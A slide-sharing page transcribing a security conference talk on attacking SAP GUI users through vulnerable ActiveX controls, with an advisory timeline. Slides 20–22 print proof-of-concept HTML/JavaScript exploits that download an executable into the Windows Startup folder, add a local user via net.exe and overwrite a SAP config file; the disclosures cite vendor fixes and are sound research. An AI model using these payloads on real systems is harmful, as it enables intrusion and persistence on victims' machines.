with sapsploit
play

with sapsploit eXtended 1.1 Alexander @sh2kerr Polyakov. Company - PowerPoint PPT Presentation

Dec 10, 2023 •226 likes •827 views

SAP Security: Attacking SAP users with sapsploit eXtended 1.1 Alexander @sh2kerr Polyakov. Company Digital Security Research Group International subdivision of Digital Security company focused on Research and Development in area of

  1. SAP Security: Attacking SAP users with sapsploit eXtended 1.1 Alexander @sh2kerr Polyakov.

  2. Company Digital Security Research Group – International subdivision of Digital Security company focused on Research and Development in area of Enterprise business Applications (ERP,CRM,SRM) and technology networks (SCADA,SDC) • ERP and SAP security assessment and pentest • ERPSCAN security scanner development • ERPSCAN Online service for SAP • SCADA security assessment/ pentest/ stuxnet forensics Digital Security - one of the oldest and leading security consulting companies in Russia from 2002. • Consulting, Certification, Compliance ISO,PCI,PA-DSS etc • Penetration testing, security assessment, application security • Information security awareness

  3. Tweet @sh2kerr  CTO at (http://dsec.ru)  Head of (http://dsecrg.com)  Architect (http://erpscan.com)  Project leader OWASP-EAS  Expert member (http://pcidss.ru )  Author of first Russian book about Oracle Database security “Oracle Security from the Eye of the Auditor. Attack and Defense” (in Russian)  Found a lot of vulnerabilities in SAP, Oracle , IBM… solutions  Speaker at HITB, Source,Troopers10,T2, InfosecurityRussia, PCIDSSRUSSIA2010 Ruscrypto, Chaos Constructions

  4. Agenda • SAP security in common • Attacking SAP users • SAP Stuxnet Prototype • Mitgations 11

  5. ERP ERP-Enterprise resource planning is an integrated computer- based system used to manage internal and external resources including tangible assets, financial resources, materials, and human resources . from Wikipedia Business applications like ERP, CRM, SRM and others are one of the major topics within the field of computer security as these applications store business data and any vulnerability in these applications can cause a significant monetary loss or even stoppage of business.

  6. Why care By 2009 number of published advisories grow • In ERP software ~ 100 • in Database software ~ 100 • in App Servers software ~ 100 • Number of SAP Notes grow in 2010 by 2 times (~300 in 2010) • Last month ~40 SAP Notes • Source: • Business application vulnerability statistics and trends by D.Evdokimov & D Chastuhin http://dsecrg.com/pages/pub/show.php?id=30 • OWASP-EAS http://www.owasp.org/index.php/Category:OWASP_Enterprise_Application_Security_Project

  7. ERP features • ERP systems have a complex structure (complexity kills security ) • Access for limited people inside a company (closed world) • Contain many different vulnerabilities in all the levels from network to application • Huge amount customization (impossible to apply one security model for all) • Rarely updated because administrators are scared they can be broken during updates

  8. SAP Security

  9. Where? • Network Architecture • OS • Database • Application • Presentation (Client-side) When we trying to secure ERP system we must do it at all levels

  10. Other •“ Technical Aspects of SAP Security ” - Alexander Polyakov @ T2.fi 2009 •“ SAP security: Attacking SAP users ” - Alexander Polyakov (Whitepaper) http://dsecrg.com/pages/pub/show.php?id=20 •“ Some notes on SAP security ” – Alexander Polyakov @ Troopers 2010 http://www.troopers.de/content/e728/e897/e910/TROOPERS10_Some_notes_on_SAP_security_Alexander_Polyakov.pdf •“ Attacking SAP users with sapsploit ” – Alexander Polyakov @HITB AMS 2010 http://dsecrg.com/pages/pub/show.php?id=27 • “ ERP Security: Myths,Problems,Solutions ” - Alexander Polyakov @ SourceBarcelona http://dsecrg.com/pages/pub/show.php?id=30 Also: • SAP guides and SAP notes • Mariano’s talks from HITB and BLACKHAT • Methodologies OWASP-EAS / BIZEC

  11. Real life situation: During one of our sap penetration tests we found that SAP infrastructure was securely separated from users network so one of the possible ways to attack this network was getting access to users workstations which can get access to SAP servers

  12. Attack users • Users are less secure • There are thousands SAP users in one company • Can attack them even if Server is fully secured • Can attack them from outside • Can use them as proxy for attacking servers • They are stupid )

  13. SAP client software • SAPGUI • JAVAGUI (usually in NIX so don’t touch this :) • WEBGUI (Browser) • NWBC • RFC • Applications such as VisualAdmin, Mobile client and many-many other stuff

  14. SAPGUI • Most common • Almost at any SAP workstation in a company • Don’t have simple auto update • Rarely patched (by users) In reality administrators even don’t think that SAPGUI must be updated (just functional updates maybe)

  16. OWASP-EAS top 10 Frontend vulns 1 Buffer overflows (ActiveX ) 2 Exposed Dangerous Method or Function (ActiveX) 3 Insecure scripting server access 4 File handling Frontend vulnerabilities 5 Use of a Broken or Risky Cryptographic Algorithm 6 Cleartext Storage of Sensitive Information 7 Use of Hard-coded Password 8 Lack of integrity checking for front-end application 9 Cleartext Transmission of Sensitive Information 10 Vulnerable remote services http://www.owasp.org/index.php/Category:OWASP_Enterprise_Application_Security_Project#tab=Development_guides

  17. EASFV-1(Buffer Overflows) • About 1000 ActiveX in SAP GUI • In 16 founded vulns • Any of them potentially vulnerable • User interaction is needed to exploit • 10-50% of successful exploitation depending on users awareness P.S. Beware of 3-rd party components http://dsecrg.com/pages/vul/show.php?id=117

  18. EASFV-1(Timeline) Date Vulnerable Author Vulnerabilit Link Component y 04.01.2007 Rfcguisink Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in- enjoysap-stack-overflow/ 04.01.2007 Kwedit Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in- enjoysap-stack-overflow/ 07.11.2008 Mdrmsap Will Dormann BOF http://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone Carsten Eiram BOF http://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D Will Dormann BOF http://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten Eiram Insecure Method http://secunia.com/secunia_research/2008-56/ 08.06.2009 Sapirrfc Alexander Polyakov ( DSecRG) BOF http://dsecrg.com/pages/vul/show.php?id=115 28.09.2009 WebWiewer3D Alexander Polyakov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=143 28.09.2009 WebWiewer2D Alexander Polyakov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=144 07.10.2009 VxFlexgrid Elazar Broad , BOF http://dsecrg.com/pages/vul/show.php?id=117 Alexander Polyakov ( DSecRG) 23.03.2010 BExGlobal Alexey Sintsov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=164 ??? Kwedit Alexander Polyakov, Alexey Troshichev Insecure Method http://dsecrg.com/pages/vul/show.php?id=145 ( DSecRG) 14 DEC 2010 Alexey Sintsov ( DSecRG) Later on http://dsecrg.com/pages/vul/show.php?id=169 DSECRG-09-069 Memory Corruption 14 DEC 2010 Alexey Sintsov (DSecRG) Later on http://dsecrg.com/pages/vul/show.php?id=170 DSECRG-09-070 Format String Alexander Polyakov (DSecRG) Later or dsecrg.com ??? DSECRG-00173 Insecure Method 18

  19. EASFV-2 (Insecure methods) There are ActiveX controls that can: • Download and exec executables such as Trojans • Run any OS command • Read or Write files • Overwrite or Delete files • Steal credentials by smbrelay • Connect to SAP servers

  20. EASFV-2 (Upload and Exec) <html> <title>DSecRG SAP ActiveX download and execute</title> <object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257" id=‘test'></object> <script language='Javascript'> function init() { var url = "http://172.16.0.1/notepad.exe"; var FileName='/../../../../../../../../../Documents and Settings/All Users/Start menu/Programs/Startup/notepad.exe'; test.Comp_Download(url,FileName); </script> DSecRG </html> [DSECRG-09-045] http://dsecrg.com/pages/vul/show.php?id=145 fixed with security note 1294913 and a workaround provided with security note 1092631

  21. EASFV-2 (Run OS Command) <html> <title>*DSecRG* Add user *DSecRG*</title> <object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id=‘test'></object> <script language='Javascript'> function init() { test.Execute("net.exe","user DSecRG p4ssW0rd /add“ ,"d: \\windows\\",1,"",1); } init(); </script> DSecRG </html> [DSECRG-09-064] http://dsecrg.com/pages/vul/show.php?id=164 fixed with security note 1407285

  22. EASFV-2 (Overwrite config/DOS) < HTML> <title>*DSecRG* delete config<title> <BODY> <object id=test classid="clsid:{A76CEBEE-7364-11D2-AA6B- 00E02924C34E}"></object> <SCRIPT> function init() { File = "c:\WINDOWS\saplogon.ini" test.SaveToSessionFile(File) } Init(); </SCRIPT> </BODY> </HTML> [DSECRG-09-043] http://dsecrg.com/pages/vul/show.php?id=143 fixed with security note 1372153

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Members of the Panel Mr David Wong (Chairman, Independent Director) Ms Chong Siak Ching

Members of the Panel Mr David Wong (Chairman, Independent Director) Ms Chong Siak Ching

Business &amp; Light Industrial Warehouse Science Park Retail Facilities Logistics and Hi-Tech Industrial Distribution 3rd Unitholders Meeting 30 June 2009 Members of the Panel Mr David Wong (Chairman, Independent Director)

451 views • 29 slides
Reporting Tips for HUD 9902 The audio is available ONLY through the conference call. Please call:

Reporting Tips for HUD 9902 The audio is available ONLY through the conference call. Please call:

Reporting Tips for HUD 9902 The audio is available ONLY through the conference call. Please call: (800) 700-7784 Participant Access Code: 366008 to join the conference call portion of the webinar September 25, 2015 9/28/2015 1 Office of

1.19k views • 70 slides
2020 Innovation Training Limited Monthly Tax Webinar Martyn Ingles 22 June 2015 Agenda

2020 Innovation Training Limited Monthly Tax Webinar Martyn Ingles 22 June 2015 Agenda

2020 Innovation Training Limited Monthly Tax Webinar Martyn Ingles 22 June 2015 Agenda Queens Speech future tax legislation HMRC and other recent tax developments Recent tax cases Pension planning - income over 150,000

426 views • 17 slides
HIGGS PRECISION PHYSICS AT THE LHC Amplitudes in the LHC era GGI, Florence Oct. 29th 2018

HIGGS PRECISION PHYSICS AT THE LHC Amplitudes in the LHC era GGI, Florence Oct. 29th 2018

HIGGS PRECISION PHYSICS AT THE LHC Amplitudes in the LHC era GGI, Florence Oct. 29th 2018 Lorenzo Tancredi - CERN TH INTRODUCTION: WHY THE HIGGS? Higgs discovery has opened a new chapter in particle physics The SM is far from being

713 views • 45 slides
Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems

Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems

Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems Computer systems can be considered a closed box. Informa8on in the box is safe as long as nothing enters or leaves the box. Systems S8ll

206 views • 16 slides
ts tr s

ts tr s

ts tr s r rs r

361 views • 8 slides
Deep Learning for Mobile Part I Instructor - Simon Lucey 16-623 - Designing Computer Vision Apps

Deep Learning for Mobile Part I Instructor - Simon Lucey 16-623 - Designing Computer Vision Apps

Deep Learning for Mobile Part I Instructor - Simon Lucey 16-623 - Designing Computer Vision Apps Today Single Layer Perceptron Multi-Layer Perceptron Convolutional Neural Network Linear Binary Classification T

1.36k views • 99 slides
Game theory (Ch. 17.5) MCTS How to find which actions are good? The Upper Confidence

Game theory (Ch. 17.5) MCTS How to find which actions are good? The Upper Confidence

Game theory (Ch. 17.5) MCTS How to find which actions are good? The Upper Confidence Bound applied to Trees UCT is commonly used: This ensures a trade off between checking branches you haven't explored much and exploring hopeful

678 views • 48 slides
Risk Management Strategy Implementation Slides Head of Quality &amp; Risk June 2016

Risk Management Strategy Implementation Slides Head of Quality &amp; Risk June 2016

Risk Management Strategy Implementation Slides Head of Quality &amp; Risk June 2016 Whats Changed? Refresh undertaken February &amp; June 2016 Roles &amp; responsibilities updated Risk Assessment Review Frequencies

540 views • 15 slides
Neural Networks for Machine Learning Lecture 11a Hopfield Nets Geoffrey Hinton Nitish

Neural Networks for Machine Learning Lecture 11a Hopfield Nets Geoffrey Hinton Nitish

Neural Networks for Machine Learning Lecture 11a Hopfield Nets Geoffrey Hinton Nitish Srivastava, Kevin Swersky Tijmen Tieleman Abdel-rahman Mohamed Hopfield Nets But John Hopfield (and others) A Hopfield net is composed of

514 views • 37 slides
CS 4803 / 7643: Deep Learning Topics: Regularization Neural Networks Optimization

CS 4803 / 7643: Deep Learning Topics: Regularization Neural Networks Optimization

CS 4803 / 7643: Deep Learning Topics: Regularization Neural Networks Optimization Computing Gradients Zsolt Kira Georgia Tech Administrativia HW0 Reminder Due: 01/18, 11:55pm Plagiarism No Tolerance

987 views • 84 slides
PIP-II 800 MeV Linac Fernanda G. Garcia PIP-II Machine Advisory Committee Meeting 15-17 March

PIP-II 800 MeV Linac Fernanda G. Garcia PIP-II Machine Advisory Committee Meeting 15-17 March

PIP-II 800 MeV Linac Fernanda G. Garcia PIP-II Machine Advisory Committee Meeting 15-17 March 2016 Outline Introduction Highlights of progress since last review - March/2015 Alternative Analysis Strategy Summary 2 F.G.

667 views • 27 slides
Discount Factor as a Regularizer in RL Ron Amit , Ron Meir (Technion) , Kamil Ciosek (MSR)

Discount Factor as a Regularizer in RL Ron Amit , Ron Meir (Technion) , Kamil Ciosek (MSR)

ICML 2020 Discount Factor as a Regularizer in RL Ron Amit , Ron Meir (Technion) , Kamil Ciosek (MSR) Microsoft Research, Cambridge UK RL problems objectives The expected -discounted return (value function) Evaluation discount

384 views • 14 slides
SELL MORE PRODUCTS ONLINE STEP FIVE SELL THEM STUFF PART 2 jane hamill 1 THE PLUS SIZED MARKET

SELL MORE PRODUCTS ONLINE STEP FIVE SELL THEM STUFF PART 2 jane hamill 1 THE PLUS SIZED MARKET

SELL MORE PRODUCTS ONLINE STEP FIVE SELL THEM STUFF PART 2 jane hamill 1 THE PLUS SIZED MARKET 2 INNOVATIVE WAY TO SELL 3 4 YOUR SALES FUNNEL $$$ $$$ 5 SOMEONE LANDS ON YOUR SITE 6 TURNING A LEAD INTO A PAYING CUSTOMER Someone lands

530 views • 31 slides
Announcements Homework 2 Due 2/11 (today) at 11:59pm Electronic HW2 Written HW2

Announcements Homework 2 Due 2/11 (today) at 11:59pm Electronic HW2 Written HW2

Announcements Homework 2 Due 2/11 (today) at 11:59pm Electronic HW2 Written HW2 Project 2 Releases today Due 2/22 at 4:00pm Mini-contest 1 (optional) Due 2/11 (today) at 11:59pm CS 188: Artificial Intelligence

936 views • 68 slides
THE NEWSVENDOR AND APPLICATIONS 2 T HE N EWSVENDOR M ODEL 3 ON EILL S H AMMER 3/2 W

THE NEWSVENDOR AND APPLICATIONS 2 T HE N EWSVENDOR M ODEL 3 ON EILL S H AMMER 3/2 W

N EWSVENDOR &amp; R EVENUE M ANAGEMENT P ROFESSOR D AVID G ILLEN (U NIVERSITY OF B RITISH C OLUMBIA ) &amp; P ROFESSOR B ENNY M ANTIN (U NIVERSITY OF W ATERLOO ) Istanbul Technical University Logistic Management in Air Transport Air

1.05k views • 73 slides
Non-Determinis)c Search CS 188: Ar)ficial Intelligence Markov

Non-Determinis)c Search CS 188: Ar)ficial Intelligence Markov

Non-Determinis)c Search CS 188: Ar)ficial Intelligence Markov Decision Processes September 28, 2015 [These slides were created by Dan Klein and Pieter

129 views • 12 slides
Environmental Protection and Rare Disasters Professor Robert J Barro Paul M Warburg Professor of

Environmental Protection and Rare Disasters Professor Robert J Barro Paul M Warburg Professor of

2014 Economica Phillips Lecture Environmental Protection and Rare Disasters Professor Robert J Barro Paul M Warburg Professor of Economics, Harvard University Senior fellow, Hoover Institution, Stanford University Professor Sir Christopher

659 views • 43 slides
Lecture 2 Bond Valuation Contact: Natt Koowattanatianchai Email: fbusnwk@ku.ac.th

Lecture 2 Bond Valuation Contact: Natt Koowattanatianchai Email: fbusnwk@ku.ac.th

Lecture 2 Bond Valuation Contact: Natt Koowattanatianchai Email: fbusnwk@ku.ac.th Homepage: http://fin.bus.ku.ac.th/nattawoot.htm Phone: 02-9428777 Ext. 1218 Mobile: 087- 5393525 Office: 9 th Floor, KBS

472 views • 20 slides
Deep Learning for NLP Kiran Vodrahalli Feb 11, 2015 Overview What is NLP? Natural

Deep Learning for NLP Kiran Vodrahalli Feb 11, 2015 Overview What is NLP? Natural

Deep Learning for NLP Kiran Vodrahalli Feb 11, 2015 Overview What is NLP? Natural Language Processing We try to extract meaning from text: sentiment, word sense, semantic similarity, etc. How does Deep Learning relate? NLP

2.02k views • 124 slides
Retrieving Comparative Arguments using Deep Pre-trained Language Models and NLU Viktoriia

Retrieving Comparative Arguments using Deep Pre-trained Language Models and NLU Viktoriia

Retrieving Comparative Arguments using Deep Pre-trained Language Models and NLU Viktoriia Chekalina, Alexander Panchenko Skolkovo Institute of Science and Technology, Philips Innovations Lab RUS 23 sent 2020 1 / 11 Task Methodology Given a

382 views • 11 slides
CSC2523: Deep Learning in Computer Vision Introduction Sanja Fidler January 12, 2016 Sanja

CSC2523: Deep Learning in Computer Vision Introduction Sanja Fidler January 12, 2016 Sanja

CSC2523: Deep Learning in Computer Vision Introduction Sanja Fidler January 12, 2016 Sanja Fidler CSC2523: Intro to Image Understanding 1 / 10 Instructor Info Instructor : Sanja Fidler ( fidler@cs.toronto.edu ) Office : 283B in Pratt Office

424 views • 10 slides
Deep Reinforcement Learning M. Soleymani Sharif University of Technology Fall 2017 Slides are

Deep Reinforcement Learning M. Soleymani Sharif University of Technology Fall 2017 Slides are

Deep Reinforcement Learning M. Soleymani Sharif University of Technology Fall 2017 Slides are based on Fei Fei Li and colleagues lectures, cs231n, Stanford 2017 and some from Surguy Levin lectures, cs294-112, Berkeley 2016. Supervised Learning

893 views • 88 slides

More recommend